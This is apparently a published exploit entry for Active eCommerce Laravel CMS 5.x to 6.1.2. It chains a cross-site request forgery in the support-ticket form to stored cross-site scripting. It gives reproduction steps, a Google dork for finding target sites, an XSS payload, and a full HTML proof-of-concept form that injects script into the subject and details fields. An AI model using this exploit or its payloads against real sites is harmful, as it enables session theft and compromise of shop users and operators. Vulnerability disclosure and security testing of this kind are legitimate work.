# Exploit Title: Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated) # Date: 25/11/2021 # Exploit Author: Keyvan Hardani # Google Dork: intext:|| WHOPPS!!!THIS IS PIRATED COPY OF ACTIVE ECOMMERCE CMS # Vendor Homepage: https://activeitzone.com/ # Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405 # Version: up to 6.1.2 # Tested on: Windows 10, Kali Linux, Burp Suite Steps to Reproduce: 1. At first login as customer to the site 2. then click the navigation bar and open "Support Ticket" 3. search for Token ( _token ) on source code and copy the value 4. Option 1: save the script as html and paste the _token into token field and hit submit 5. Option 2: use XSS payload </textarea><script>alert(document.domain)</script> in Description or subject value on support ticket. 5. Now Generate a CSRF POC More info & Video: https://github.com/Keyvanhardani/Active-eCommerce-Laravel-CMS-5.5.2-Cross-Site-request-forgery-CSRF-to-Cross-site-Scripting-XSS Proof of Concept: <!DOCTYPE html> <html> <body> <form action="https://site.com/ecommerce/support_ticket" method="POST"> <input type="text" name="_token" value="gShF0bUHgMjfSmO7sqd5J5mSzvXJFnB0qeEmc6vD" placeholder="input the token and submit the form"> <input type="hidden" name="subject" value="test<script>alert(document.cookie)</script>"> <input type="hidden" name="details" value="test<script>alert(document.cookie)</script>"> <input type="hidden" name="attachments" class="selected-files"> <input type="submit" value="submit"> </form> </body> </html> DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.